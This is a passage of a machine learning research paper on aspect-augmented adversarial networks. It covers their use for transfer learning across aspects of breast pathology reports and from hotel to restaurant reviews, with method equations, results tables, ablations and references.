annotations are assumed to be available during train- ing and testing. In this scenario, we could simply lift the sets of relevant sentences from each document as new types of documents. The goal would be then to learn to classify documents of type T (consisting of sentences relevant to the target aspect) based on having labels only for type S (source) documents, a standard domain adaptation task. Our problem is more challenging as the aspect-relevance of sen- tences must be learned from limited annotations. Finally, we note that the aspect transfer problem and the method we develop to solve it work the same even when source and target documents are a priori different, something we will demonstrate later. 4 Methods 4.1 Overview of our approach Our model consists of three key components as shown in Figure 2. Each document is encoded in a relevance weighted, aspect-dependent manner (green, left part of Figure 2) and classified using the label predictor (blue, top-right). During training, the encoded documents are also passed on to the domain classifier (orange, bottom-right). The role of the do- main classifier, as the adversary, is to ensure that the aspect-dependent encodings of documents are distri- butionally matched. This matching justifies the use of the same end-classifier to provide the predicted label regardless of the task (aspect). 3rai = 1 if the sentence contains keywords pertaining to both aspect a and other aspects. 518 Pathology report INVASIVE DUCTAL CAR- CINOMA Tumor size … Grade: 3. ………………. Lymphatic vessel in- vasion: Not identified. … (IDC) is identified … … … … r = 1.0 Predicted Relevance Score … … r = 0.0r = 0.9 … … D ocum ent representation Transformation Layer … … Class label yl Objective: predict labels Sentence embeddings Weighted combination Adversary objective: confuse the domain classifier … Domain label ya Objective: predict domains backprop backprop (b) Label predictor (c) Domain classifier (a) Document encoder r̂ = 1.0 r̂ = 0.0 r̂ = 0.9 Figure 2: Aspect-augmented adversarial network for transfer learning. The model is composed of (a) an aspect-driven document encoder, (b) a label predictor and (c) a domain classifier. To encode a document, the model first maps each sentence into a vector and then passes the vector to a scoring network to determine whether the sentence is relevant for the chosen aspect. These predicted relevance scores are used to obtain document vec- tors by taking relevance-weighted sum of the asso- ciated sentence vectors. Thus, the manner in which the document vector is constructed is always aspect- dependent due to the chosen relevance weights. During training, the resulting adjusted document vectors are consumed by the two classifiers. The pri- mary label classifier aims to predict the source labels (when available), while the domain classifier deter- mines whether the document vector pertains to the source or target aspect, which is the label that we know by construction. Furthermore, we jointly up- date the document encoder with a reverse of the gra- dient from the domain classifier, so that the encoder learns to induce document representations that fool the domain classifier. The resulting encoded repre- sentations will be aspect-invariant, facilitating trans- fer. Our adversarial training scheme uses all the train- ing losses concurrently to adjust the model param- eters. During testing, we simply encode each test document in a target-aspect dependent manner, and apply the same label predictor. We expect that the same label classifier does well on the target task since it solves the source task, and operates on relevance-weighted representations that are matched across the tasks. While our method is designed to work in the extreme setting that the examples for the two aspects are the same, this is by no means a re- reconstruction of ductal carcinoma is identified … … … … … … … … …… …sentence embeddings max-pooling: … x0 x1 x2 x3 x̂2 = tanh(W ch2 + b c) x2 h1 h2 xsen = max{h1, h2, . . .} Figure 3: Illustration of the convolutional model and the reconstruction of word embeddings from the as- sociated convolutional layer. quirement. Our method will also work fine in the more traditional domain adaptation setting, which we will demonstrate later. 4.2 Components in detail Sentence embedding We apply a convolutional model illustrated in Figure 3 to each sentence si to obtain sentence-level vector embeddings xseni . The use of RNNs or bi-LSTMs would result in more flex- ible sentence embeddings but based on our initial ex- periments, we did not observe any significant gains over the simpler CNNs. We further ground the resulting sentence embed- dings by including an additional word-level recon- struction step in the convolutional model. The pur- pose of this reconstruction step is to balance adver- sarial training signals propagating back from the do- main classifier. Specifically, it forces the sentence encoder to keep rich word-level information in con- trast to adversarial training that seeks to eliminate aspect specific features. We provide an empirical analysis of the impact of this reconstruction in the 519 experiment section (Section 7). More concretely, we reconstruct word embed- ding from the corresponding convolutional layer, as shown in Figure 3.4 We use xi,j to denote the em- bedding of the j-th word in sentence si. Let hi,j be the convolutional output when xi,j is at the center of the window. We reconstruct xi,j by x̂i,j = tanh(W chi,j + b c) (1) where Wc and bc are parameters of the reconstruc- tion layer. The loss associated with the reconstruc- tion for document d is Lrec(d) = 1 n ∑ i,j ||x̂i,j − tanh(xi,j)||22 (2) where n is the number of tokens in the document and indexes i, j identify the sentence and word, respec- tively. The overall reconstruction loss Lrec is ob- tained by summing over all labeled/unlabeled docu- ments. Relevance prediction We use a small set of keyword rules to generate binary relevance labels, both positive (r = 1) and negative (r = 0). These la- bels represent the only supervision available to pre- dict relevance. The prediction is made on the basis of the sentence vector xseni passed through a feed- forward network with a ReLU output unit. The net- work has a single shared hidden layer and a separate output layer for each aspect. Note that our relevance prediction network is trained as a non-negative re- gression model even though the available labels are binary, as relevance varies more on a linear rather than binary scale. Given relevance labels indexed by R = {(a,l, i)}, we minimize Lrel = ∑ (a,l,i)∈R ( ral,i − r̂al,i )2 (3) where r̂al,i is the predicted (non-negative) relevance score pertaining to aspect a for the ith sentence in document dl, as shown in the left part of Figure 2. ral,i, defined earlier, is the given binary (0/1) rele- vance label. We use a score in [0, 1] scale because it can be naturally used as a weight for vector combi- nations, as shown next. 4 This process is omitted in Figure 2 for brevity. Document encoding The initial vector repre- sentation for each document such as dl is obtained as a relevance weighted combination of the associ- ated sentence vectors, i.e., x doc,a l = ∑ i r̂ a l,i ·xsenl,i∑ i r̂ a l,i (4) The resulting vector selectively encodes information from the sentences based on relevance to the focal aspect. Transformation layer The manner in which document vectors arise from sentence vectors means that they will retain aspect-specific information that will hinder transfer across aspects. To help re- move non-transferable information, we add a trans- formation layer to map the initial document vectors x doc,a l to their domain invariant (as a set) versions, as shown in Figure 2. Specifically, the transformed rep- resentation is given by xtr,al = W trx doc,a l . Mean- while, the transformation has to be strongly regular- ized lest the gradient from the adversary would wipe out all the document signal. We add the following regularization term Ωtr = λtr||Wtr − I||2F (5) to discourage significant deviation away from iden- tity I. λtr is a regularization parameter that has to be set separately based on validation performance. We show an empirical analysis of the impact of this transformation layer in Section 7. Primary label classifier As shown in the top- right part of Figure 2, the classifier takes in the adjusted document representation as an input and predicts a probability distribution over the possible class labels. The classifier is a feed-forward net- work with a single hidden layer using ReLU acti- vations and a softmax output layer over the possible class labels. Note that we train only one label clas- sifier that is shared by both aspects. The classifier operates the same regardless of the aspect to which the document was encoded. It must therefore be co- operatively learned together with the encodings. Let p̂l;k denote the predicted probability of class k for document dl when the document is encoded from the point of view of the source aspect. Recall that [ysl;1, . . . ,y s l;m] is a one-hot vector for the correct 520 (given) source class label for document dl, hence also a distribution. We use the cross-entropy loss for the label classifier Llab = ∑ l∈L [ − m∑ k=1 ysl;k log p̂l;k ] (6) Domain classifier As shown in the bottom- right part of Figure 2, the domain classifier func- tions as an adversary to ensure that the documents encoded with respect to the source and target as- pects look the same as sets of examples. The in- variance is achieved when the domain classifier (as the adversary) fails to distinguish between the two. Structurally, the domain classifier is a feed-forward network with a single ReLU hidden layer and a soft- max output layer over the two aspect labels. Let ya = [ya1,y a 2 ] denote the one-hot domain la- bel vector for aspect a ∈ {s,t}. In other words, ys = [1, 0] and yt = [0, 1]. We use q̂k(x tr,a l ) as the predicted probability that the domain label is k when the domain classifier receives xtr,al as the input. The domain classifier is trained to minimize Ldom = ∑ l∈L∪U ∑ a∈{s,t} [ − 2∑ k=1 yak log q̂k(x tr,a l ) ] (7) 4.3 Joint learning We combine the individual component losses per- taining to word reconstruction, relevance labels, transformation layer regularization, source class la- bels, and domain adversary into an overall objective function Lall = Lrec + Lrel + Ωtr + Llab −ρLdom (8) which is minimized with respect to the model pa- rameters except for the adversary (domain classi- fier). The adversary is maximizing the same objec- tive with respect to its own parameters. The last term −ρLdom corresponds to the objective of causing the domain classifier to fail. The proportionality con- stant ρ controls the impact of gradients from the ad- versary on the document representation; the adver- sary itself is always directly minimizing Ldom. All the parameters are optimized jointly using standard backpropagation (concurrent for the adver- sary). Each mini-batch is balanced by aspect, half DATASET #Labeled #Unlabeled PATHOLOGY DCIS 23.8k 96.6k LCIS 10.7k IDC 22.9k ALH 9.2k REVIEW Hotel 100k 100k Restaurant - 200k Table 1: Statistics of the pathology reports dataset and the reviews dataset that we use for training. Our model utilizes both labeled and unlabeled data. ASPECT KEYWORDS IDC IDC, Invasive Ductal Carcinoma ALH ALH, Atypical Lobular Hyperplasia Table 2: Examples of aspects and their correspond- ing keywords (case insensitive) in the pathology dataset. coming from the source, the other half from the tar- get. All the loss functions except Llab make use of both labeled and unlabeled documents. Addition- ally, it would be straightforward to add a loss term for target labels if they are available. 5 Experimental Setup Pathology dataset This dataset contains 96.6k breast pathology reports collected from three hos- pitals (Yala et al., 2016). A portion of this dataset is manually annotated with 20 categorical values, representing various aspects of breast disease. In our experiments, we focus on four aspects related to carcinomas and atypias: Ductal Carcinoma In- Situ (DCIS), Lobular Carcinoma In-Situ (LCIS), In- vasive Ductal Carcinoma (IDC) and Atypical Lob- ular Hyperplasia (ALH). Each aspect is annotated using binary labels. We use 500 held out reports as our test set and use the rest of the labeled data as our training set: 23.8k reports for DCIS, 10.7k for LCIS, 22.9k for IDC, and 9.2k for ALH. Table 1 summa- rizes statistics of the dataset. We explore the adaptation problem from one as- pect to another. For example, we want to train a model on annotations of DCIS and apply it on LCIS. For each aspect, we use up to three common names 521 as a source of supervision for learning the relevance scorer, as illustrated in Table 2. Note that the pro- vided list is by no means exhaustive. In fact Buckley et al. (2012) provide example of 60 different verbal- izations of LCIS, not counting negations. Review dataset Our second experiment is based on a domain transfer of sentiment classifica- tion. For the source domain, we use the hotel re- view dataset introduced in previous work (Wang et al., 2010; Wang et al., 2011), and for the target domain, we use the restaurant review dataset from Yelp.5 Both datasets have ratings on a scale of 1 to 5 stars. Following previous work (Blitzer et al., 2007), we label reviews with ratings > 3 as posi- tive and those with ratings < 3 as negative, discard- ing the rest. The hotel dataset includes a total of around 200k reviews collected from TripAdvisor,6 so we split 100k as labeled and the other 100k as unlabeled data. We randomly select 200k restaurant reviews as the unlabeled data in the target domain. Our test set consists of 2k reviews. Table 1 summa- rizes the statistics of the review dataset. The hotel reviews naturally have ratings for six aspects, including value, room quality, checkin ser- vice, room service, cleanliness and location. We use the first five aspects because the sixth aspect loca- tion has positive labels for over 95% of the reviews and thus the trained model will suffer from the lack of negative examples. The restaurant reviews, how- ever, only have single ratings for an overall impres- sion. Therefore, we explore the task of adaptation from each of the five hotel aspects to the restau- rant domain. The hotel reviews dataset also pro- vides a total of 280 keywords for different aspects that are generated by the bootstrapping method used in Wang et al. (2010). We use those keywords as supervision for learning the relevance scorer. Baselines and our method We first compare against a linear SVM trained on the raw bag- of-words representation of labeled data in source. Second, we compare against our SourceOnly model that assumes no target domain data or key- words. It thus has no adversarial training or tar- get aspect-relevance scoring. Next we compare 5The restaurant portion of https://www.yelp.com/ dataset_challenge. 6https://www.tripadvisor.com/ METHOD SOURCE TARGET Key- wordLab. Unlab. Lab. Unlab. SVM X × × × × SourceOnly X X × × X mSDA X X × X × AAN-NA X X × X X AAN-NR X X × X × In-Domain × × X × X AAN-Full X X × X X Table 3: Usage of labeled (Lab.), unlabeled (Un- lab.) data and keyword rules in each domain by our model and other baseline methods. AAN-* denote our model and its variants. with marginalized Stacked Denoising Autoencoders (mSDA) (Chen et al., 2012), a domain adaptation algorithm that outperforms both prior deep learning and shallow learning approaches.7 In the rest part of the paper, we name our method and its variants as AAN (Aspect-augmented Adversarial Networks). We compare against AAN- NA and AAN-NR that are our model variants without adversarial training and without aspect- relevance scoring respectively. Finally we in- clude supervised models trained on the full set of In-Domain annotations as the performance upper bound. Table 3 summarizes the usage of labeled and unlabeled data in each domain as well as keyword rules by our model (AAN-Full) and different base- lines. Note that our model assumes the same set of data as the AAN-NA, AAN-NR and mSDA meth- ods. Implementation details Following prior work (Ganin and Lempitsky, 2014), we gradually increase the adversarial strength ρ and decay the learning rate during training. We also apply batch normalization (Ioffe and Szegedy, 2015) on the sentence encoder and apply dropout with a ratio of 0.2 on word em- beddings and each hidden layer activation. We set the hidden layer size to 150 and pick the transforma- tion regularization weight λt = 0.1 for the pathol- 7We use the publicly available implementation provided by the authors at http://www.cse.wustl.edu/˜mchen/ code/mSDA.tar. We use the hyper-parameters from the au- thors and their models have more parameters than ours. 522 DOMAIN SVM Source mSDA AAN-NA AAN-NR AAN-Full In-Domain SOURCE TARGET Only LCIS DCIS 45.8 25.2 45.0 81.2 50.0 93.0 96.2IDC 71.8 62.4 73.0 87.6 81.4 94.8 ALH 37.2 20.6 39.0 49.2 48.0 84.6 DCIS LCIS 73.8 75.4 76.2 89.0 81.2 95.2 97.8IDC 71.4 66.4 71.6 84.8 52.0 85.0 ALH 54.4 46.4 54.2 84.8 52.4 93.2 DCIS IDC 94.0 77.4 94.0 92.4 93.8 95.4 96.8LCIS 51.6 29.5 53.2 89.6 51.2 93.8 ALH 41.0 26.8 39.2 68.0 31.6 89.6 DCIS ALH 74.6 75.0 75.0 52.6 74.2 90.4 96.8LCIS 59.0 51.6 60.4 52.6 60.0 92.8 IDC 67.6 66.4 68.8 52.6 69.2 87.0 AVERAGE 61.9 51.9 62.5 71.0 64.2 91.2 96.9 Table 4: Pathology: Classification accuracy (%) of different approaches on the pathology reports dataset, including the results of twelve adaptation scenarios from four different aspects (IDC, ALH, DCIS and LCIS) in breast cancer pathology reports. “mSDA” indicates the marginalized denoising autoencoder in (Chen et al., 2012). “AAN-NA” and “AAN-NR” corresponds to our model without the adversarial training and the aspect-relevance scoring component, respectively. We also include in the last column the in-domain supervised training results of our model as the performance upper bound. Boldface numbers indicate the best accuracy for each testing scenario. ogy dataset and λt = 10.0 for the review dataset. 6 Main Results Table 4 summarizes the classification accuracy of different methods on the pathology dataset, includ- ing the results of twelve adaptation tasks. Our full model (AAN-Full) consistently achieves the best performance on each task compared with other base- lines and model variants. It is not surprising that SVM and mSDA perform poorly on this dataset be- cause they only predict labels based on an overall feature representation of the input, and do not utilize weak supervision provided by aspect-specific key- words. As a reference, we also provide a perfor- mance upper bound by training our model on the full labeled set in the target domain, denoted as In- Domain in the last column of Table 4. On average, the accuracy of our model (AAN-Full) is only 5.7% behind this upper bound. Table 5 shows the adaptation results from each aspect in the hotel reviews to the overall ratings of restaurant reviews. AAN-Full and AAN-NR are the two best performing systems on this review dataset, attaining around 5% improvement over the mSDA baseline. Below, we summarize our findings when comparing the full model with the two model vari- ants AAN-NA and AAN-NR. Impact of adversarial training We first focus on comparisons between AAN-Full and AAN-NA. The only difference between the two models is that AAN-NA has no adversarial training. On the pathol- ogy dataset, our model significantly outperforms AAN-NA, yielding a 20.2% absolute average gain (see Table 4). On the review dataset, our model obtains 2.5% average improvement over AAN-NA. As shown in Table 5, the gains are more significant when training on room and checkin aspects, reaching 6.9% and 4.5%, respectively. Impact of relevance scoring As shown in Ta- ble 4, the relevance scoring component plays a cru- cial role in classification on the pathology dataset. 523 DOMAIN SVM Source mSDA AAN-NA AAN-NR AAN-Full In-Domain SOURCE TARGET Only Value Restaurant Overall 82.2 87.4 84.7 87.1 91.1 89.6 93.4 Room 75.6 79.3 80.3 79.7 86.1 86.6 Checkin 77.8 83.0 81.0 80.9 87.2 85.4 Service 82.2 88.0 83.8 88.8 87.9 89.1 Cleanliness 77.9 83.2 78.4 83.1 84.5 81.4 AVERAGE 79.1 84.2 81.6 83.9 87.3 86.4 93.4 Table 5: Review: Classification accuracy (%) of different approaches on the reviews dataset. Columns have the same meaning as in Table 4. Boldface numbers indicate the best accuracy for each testing scenario. 1.0 0.8 0.6 0.4 0.2 0.0 w/o reconstruction with reconstruction 1.0 0.8 0.6 0.4 0.2 0.0 +adversarial, -reconstruction-adversarial, -reconstruction +adversarial, +reconstruction Figure 4: Heat map of 150×150 matrices. Each row corresponds to the vector representation of a document that comes from either the source domain (top half) or the target domain (bottom half). Models are trained on the review dataset when room quality is the source aspect. Our model achieves more than 27% improvement over AAN-NR. This is because, in general, aspects have zero correlations to each other in pathology reports. Therefore, it is essential for the model to have the capacity of distinguishing across different aspects in order to succeed in this task. On the review dataset, however, we observe that relevance scoring has no significant impact on per- formance. On average, AAN-NR actually outper- forms AAN-Full by 0.9%. This observation can be explained by the fact that different aspects in ho- tel reviews are highly correlated to each other. For example, the correlation between room quality and cleanliness is 0.81, much higher than aspect corre- lations in the pathology dataset. In other words, the sentiment is typically consistent across all sen- tences in a review, so that selecting aspect-specific sentences becomes unnecessary. Moreover, our su- pervision for the relevance scorer is weak and noisy because the aspect keywords are obtained in a semi- automatic way. Therefore, it is not surprising that AAN-NR sometimes delivers a better classification DATASET AAN-Full AAN-NA -REC. +REC. -REC. +REC. PATHOLOGY 86.2 91.2 68.6 72.0 REVIEW 80.8 86.4 85.0 83.9 Table 6: Impact of adding the reconstruction com- ponent in the model, measured by the average ac- curacy on each dataset. +REC. and -REC. denote the presence and absence of the reconstruction loss, respectively. accuracy than AAN-Full. 7 Analysis Impact of the reconstruction loss Table 6 summarizes the impact of the reconstruction loss on the model performance. For our full model (AAN- Full), adding the reconstruction loss yields an aver- age of 5.0% gain on the pathology dataset and 5.6% on the review dataset. 524 Restaurant Reviews • the fries were undercooked and thrown haphazardly into the sauce holder . the shrimp was over cooked and just deepfried . … even the water tasted weird . … • i had the shrimp boil and it was very under- seasoned . much closer to bland than anything . … • the room was old . … we did n’t like the night shows at all . … • however , the decor was just fair . … the doorknob to our bathroom door fell off , as well as the handle on the toilet . … in the second bedroom it literally rained water from above . • the room decor was not entirely modern . … we just had the run of the mill hotel room without a view . • stay away from fresh vegetable like lettuce , etc . … • rest room in this restaurant is very dirty . … • the only problem i had was that … i was very ill with what was suspected to be food poison • probably the noisiest room he could have given us in the whole hotel . Nearest Hotel Reviews by Ours-Full Nearest Hotel Reviews by Ours-NA Restaurant Reviews • the fries were undercooked and thrown haphazardly into the sauce holder . the shrimp was over cooked and just deepfried . … even the water tasted weird . … • the room was old . … we did n’t like the night shows at all . … • however , the decor was just fair . … in the second bedroom it literally rained water from above . • rest room in this restaurant is very dirty . … • the only problem i had was that … i was very ill with what was suspected to be food poison Nearest Hotel Reviews by Ours-Full Nearest Hotel Reviews by Ours-NA Figure 5: Examples of restaurant reviews and their nearest neighboring hotel reviews induced by different models (column 2 and 3). We use room quality as the source aspect. The sentiment phrases of each review are in blue, and some reviews are also shortened for space. DATASET λt = 0 0 < λt < ∞ λt = ∞ PATHOLOGY 77.4 91.2 81.4 REVIEW 80.9 86.4 84.3 Table 7: The effect of regularization of the transfor- mation layer λt on the performance. To analyze the reasons behind this difference, consider Figure 4 that shows the heat maps of the learned document representations on the review dataset. The top half of the matrices corresponds to input documents from the source domain and the bottom half corresponds to the target domain. Un- like the first matrix, the other two matrices have no significant difference between the two halves, in- dicating that adversarial training helps learning of domain-invariant representations. However, adver- sarial training also removes a lot of information from representations, as the second matrix is much more sparse than the first one. The third matrix shows that adding reconstruction loss effectively addresses this sparsity issue. Almost 85% of the entries of the second matrix have small values (< 10−6) while the sparsity is only about 30% for the third one. Moreover, the standard deviation of the third ma- trix is also ten times higher than the second one. These comparisons demonstrate that the reconstruc- tion loss function improves both the richness and diversity of the learned representations. Note that in the case of no adversarial training (AAN-NA), adding the reconstruction component has no clear effect. This is expected because the main motiva- tion of adding this component is to achieve a more robust adversarial training. Regularization on the transformation layer Table 7 shows the averaged accuracy with differ- ent regularization weights λt in Equation 5. We change λt to reflect different model variants. First, λt = ∞ corresponds to the removal of the transfor- mation layer because the transformation is always identity in this case. Our model performs better than this variant on both datasets, yielding an average improvement of 9.8% on the pathology dataset and 2.1% on the review dataset. This result indicates the importance of adding the transformation layer. Sec- ond, using zero regularization (λt = 0) also consis- tently results in inferior performance, such as 13.8% loss on the pathology dataset. We hypothesize that zero regularization will dilute the effect from re- construction because there is too much flexibility in transformation. As a result, the transformed repre- sentation will become sparse due to the adversarial training, leading to a performance loss. Examples of neighboring reviews Finally, in Figure 5 we illustrate a case study on the charac- teristics of learned abstract representations by dif- ferent models. The first column shows an example restaurant review. Sentiment phrases in this example are mostly food-specific, such as “undercooked” and “tasted weird”. In the other two columns, we show example hotel reviews that are nearest neighbors to the restaurant reviews, measured by cosine simi- larity between their representations. In column 2, many sentiment phrases are specific for room qual- ity, such as “old” and “rained water from above”. In column 3, however, most sentiment phrases are either common sentiment expressions (e.g. dirty) or food-related (e.g. food poison), even though the focus of the reviews is based on the room quality of hotels. This observation indicates that adversar- ial training (AAN-Full) successfully learns to elim- inate domain-specific information and to map those domain-specific words into similar domain-invariant 525 Figure 6: Classification accuracy (y-axis) on two transfer scenarios (one on review and one on pathol- ogy dataset) with a varied number of keyword rules for learning sentence relevance (x-axis). representations. In contrast, AAN-NA only captures domain-invariant features from phrases that com- monly present in both domains. Impact of keyword rules Finally, Figure 6 shows the accuracy of our full model (y-axis) when trained with various amount of keyword rules for relevance learning (x-axis). As expected, the trans- fer accuracy drops significantly when using fewer rules on the pathology dataset (LCIS as source and ALH as target). In contrary, the accuracy on the re- view dataset (hotel service as source and restaurant as target) is not sensitive to the amount of used rel- evance rules. This can be explained by the observa- tion from Table 5 that the model without relevance scoring performs equally well as the full model due to the tight dependence in aspect labels. 8 Conclusions In this paper, we propose a novel aspect-augmented adversarial network for cross-aspect and cross- domain adaptation tasks. Experimental results demonstrate that our approach successfully learns invariant representation from aspect-relevant frag- ments, yielding significant improvement over the mSDA baseline and our model variants. The effec- tiveness of our approach suggests the potential ap- plication of adversarial networks to a broader range of NLP tasks for improved representation learning, such as machine translation and language genera- tion. Acknowledgments The authors acknowledge the support of the U.S. Army Research Office under grant number W911NF-10-1-0533. We thank the MIT NLP group, the TACL action editor Hal Daumé III and the anonymous reviewers for their comments. Any opinions, findings, conclusions, or recommenda- tions expressed in this paper are those of the authors, and do not necessarily reflect the views of the fund- ing organizations. References Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of the ICLR. John Blitzer, Mark Dredze, Fernando Pereira, et al. 2007. Biographies, bollywood, boom-boxes and blenders: Domain adaptation for sentiment classification. In Proceedings of the ACL, volume 7, pages 440–447. Antoine Bordes, Xavier Glorot, Jason Weston, and Yoshua Bengio. 2012. Joint learning of words and meaning representations for open-text semantic pars- ing. In Proceedings of the AISTATS, volume 22, pages 127–135. Konstantinos Bousmalis, George Trigeorgis, Nathan Sil- berman, Dilip Krishnan, and Dumitru Erhan. 2016. Domain separation networks. In Advances in Neural Information Processing Systems (NIPS). Caroline Brun, Julien Perez, and Claude Roux. 2016. XRCE at SemEval-2016 task 5: Feedbacked ensem- ble modeling on syntactico-semantic knowledge for aspect based sentiment analysis. In Proceedings of the 10th International Workshop on Semantic Evaluation (SemEval-2016), pages 277–281. Julliette M. Buckley, Suzanne B. Coopey, John Sharko, Fernanda Polubriaginof, Brian Drohan, Ahmet K. Belli, Elizabeth MH. Kim, Judy E. Garber, Barbara L. Smith, Michele A. Gadd, et al. 2012. The feasibility of using natural language processing to extract clinical information from breast pathology reports. Journal of pathology informatics, 3(1):23. Rich Caruana. 1998. Multitask learning. In Learning to learn, pages 95–133. Springer. Ming-Wei Chang, Lev Ratinov, and Dan Roth. 2007. Guiding semi-supervision with constraint- driven learning. In Proceedings of the ACL, vol- ume 45, page 280. Minmin Chen, Zhixiang Xu, Kilian Weinberger, and Fei Sha. 2012. Marginalized denoising autoencoders for domain adaptation. In Proceedings of the ICML. 526 Kan Chen, Jiang Wang, Liang-Chieh Chen, Haoyuan Gao, Wei Xu, and Ram Nevatia. 2015. ABC- CNN: An attention based convolutional neural net- work for visual question answering. arXiv preprint arXiv:1511.05960v2. Jianpeng Cheng, Li Dong, and Mirella Lapata. 2016. Long short-term memory-networks for machine read- ing. In Proceedings of the EMNLP. Sumit Chopra, Suhrid Balakrishnan, and Raghuraman Gopalan. 2013. DLID: Deep learning for do- main adaptation by interpolating between domains. In ICML Workshop on Challenges in Representation Learning. Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neu- ral networks with multitask learning. In Proceed- ings of the 25th International Conference on Machine Learning, pages 160–167. ACM. Jacob Eisenstein. 2017. Unsupervised learning for lexicon-based classification. In Proceedings of the Na- tional Conference on Artificial Intelligence (AAAI). Yaroslav Ganin and Victor Lempitsky. 2014. Unsuper- vised domain adaptation by backpropagation. In Pro- ceedings of the ICML. Yaroslav Ganin, Evgeniya Ustinova, Hana Ajakan, Pascal Germain, Hugo Larochelle, François Laviolette, Mario Marchand, and Victor Lempitsky. 2015. Domain- adversarial training of neural networks. Journal of Machine Learning Research. Xavier Glorot, Antoine Bordes, and Yoshua Bengio. 2011. Domain adaptation for large-scale sentiment classification: A deep learning approach. In Proceed- ings of the 28th International Conference on Machine Learning (ICML-11), pages 513–520. Ian Goodfellow, Jean Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley, Sherjil Ozair, Aaron Courville, and Yoshua Bengio. 2014. Generative ad- versarial nets. In Advances in Neural Information Pro- cessing Systems, pages 2672–2680. Trond Grenager, Dan Klein, and Christopher D. Man- ning. 2005. Unsupervised learning of field segmen- tation models for information extraction. In Proceed- ings of the 43rd Annual Meeting on Association for Computational Linguistics, pages 371–378. Associa- tion for Computational Linguistics. Aria Haghighi and Dan Klein. 2006. Prototype-driven learning for sequence models. In Proceedings of the main conference on Human Language Technol- ogy Conference of the North American Chapter of the Association of Computational Linguistics, pages 320– 327. Association for Computational Linguistics. Sergey Ioffe and Christian Szegedy. 2015. Batch nor- malization: Accelerating deep network training by re- ducing internal covariate shift. In Proceedings of the ICML. Jagadeesh Jagarlamudi, Hal Daumé III, and Raghaven- dra Udupa. 2012. Incorporating lexical priors into topic models. In Proceedings of the 13th Conference of the European Chapter of the Association for Com- putational Linguistics, pages 204–213. Association for Computational Linguistics. Tao Lei, Regina Barzilay, and Tommi Jaakkola. 2016. Rationalizing neural predictions. In Proceedings of the EMNLP. Shen Li, Joao V. Graça, and Ben Taskar. 2012. Wiki- ly supervised part-of-speech tagging. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, pages 1389–1398. Asso- ciation for Computational Linguistics. Xiaodong Liu, Jianfeng Gao, Xiaodong He, Li Deng, Kevin Duh, and Ye-Yi Wang. 2015. Representation learning using multi-task deep neural networks for se- mantic classification and information retrieval. In Pro- ceedings of the HLT-NAACL, pages 912–921. Mingsheng Long, Han Zhu, Jianmin Wang, and Michael I. Jordan. 2016. Unsupervised domain adap- tation with residual transfer networks. In Advances in Neural Information Processing Systems, pages 136– 144. Alireza Makhzani, Jonathon Shlens, Navdeep Jaitly, and Ian Goodfellow. 2015. Adversarial autoencoders. arXiv preprint arXiv:1511.05644v2. Gideon S. Mann and Andrew McCallum. 2010. General- ized expectation criteria for semi-supervised learning with weakly labeled data. Journal of machine learn- ing research, 11:955–984. Iain J. Marshall, Joël Kuiper, and Byron C. Wallace. 2015. RobotReviewer: evaluation of a system for au- tomatically assessing bias in clinical trials. Journal of the American Medical Informatics Association. André F.T. Martins and Ramón Fernandez Astudillo. 2016. From softmax to sparsemax: A sparse model of attention and multi-label classification. Sinno Jialin Pan and Qiang Yang. 2010. A survey on transfer learning. IEEE Transactions on Knowledge and Data Engineering, 22(10):1345–1359. Liron Pantanowitz, Maryanne Hornish, and Robert A. Goulart. 2008. Informatics applied to cytology. Cyto- journal, 5. Alec Radford, Luke Metz, and Soumith Chintala. 2016. Unsupervised representation learning with deep con- volutional generative adversarial networks. In Pro- ceedings of the ICLR. Alexander M. Rush, Sumit Chopra, and Jason Weston. 2015. A neural attention model for abstractive sen- tence summarization. In Proceedings of the EMNLP. 527 Ozan Sener, Hyun Oh Song, Ashutosh Saxena, and Sil- vio Savarese. 2016. Learning transferrable repre- sentations for unsupervised domain adaptation. In Advances In Neural Information Processing Systems, pages 2110–2118. Yusuke Shinohara. 2016. Adversarial multi-task learn- ing of deep neural networks for robust speech recogni- tion. Interspeech 2016, pages 2369–2372. Jost Tobias Springenberg. 2015. Unsupervised and semi- supervised learning with categorical generative adver- sarial networks. arXiv preprint arXiv:1511.06390v2. Yaniv Taigman, Adam Polyak, and Lior Wolf. 2016. Unsupervised cross-domain image generation. arXiv preprint arXiv:1611.02200. Eric Tzeng, Judy Hoffman, Ning Zhang, Kate Saenko, and Trevor Darrell. 2014. Deep domain confusion: Maximizing for domain invariance. arXiv preprint arXiv:1412.3474. Hongning Wang, Yue Lu, and Chengxiang Zhai. 2010. Latent aspect rating analysis on review text data: a rat- ing regression approach. In Proceedings of the 16th ACM SIGKDD International Conference on Knowl- edge Discovery and Data Mining, pages 783–792. ACM. Hongning Wang, Yue Lu, and ChengXiang Zhai. 2011. Latent aspect rating analysis without aspect key- word supervision. In Proceedings of the 17th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pages 618–626. ACM. Huijuan Xu and Kate Saenko. 2016. Ask, attend and answer: Exploring question-guided spatial attention for visual question answering. In Proceedings of the ECCV. Kelvin Xu, Jimmy Ba, Ryan Kiros, Kyunghyun Cho, Aaron Courville, Ruslan Salakhutdinov, Richard S. Zemel, and Yoshua Bengio. 2015. Show, attend and tell: Neural image caption generation with visual at- tention. In Proceedings of the ICML, page 5. Adam Yala, Regina Barzilay, Laura Salama, Molly Griffin, Grace Sollender, Aditya Bardia, Constance Lehman, Julliette M. Buckley, Suzanne B. Coopey, Fernanda Polubriaginof, Judy E. Garber, Barbara L. Smith, Michele A. Gadd, Michelle C. Specht, Thomas M. Gudewicz, Anthony Guidi, Alphonse Taghian, and Kevin S. Hughes. 2016. Using machine learning to parse breast pathology reports. Breast Can- cer Research and Treatment. Zichao Yang, Xiaodong He, Jianfeng Gao, Li Deng, and Alex Smola. 2016. Stacked attention networks for image question answering. In Proceedings of the Con- ference on Computer Vision and Pattern Recognition (CVPR). Omar Zaidan, Jason Eisner, and Christine D. Piatko. 2007. Using “annotator rationales” to improve ma- chine learning for text categorization. In Proceedings of the HLT-NAACL, pages 260–267. Citeseer. Ye Zhang, Iain Marshall, and Byron C. Wallace. 2016. Rationale-augmented convolutional neural networks for text classification. In Proceedings of the EMNLP. Guangyou Zhou, Zhiwen Xie, Jimmy Xiangji Huang, and Tingting He. 2016. Bi-transferring deep neural net- works for domain 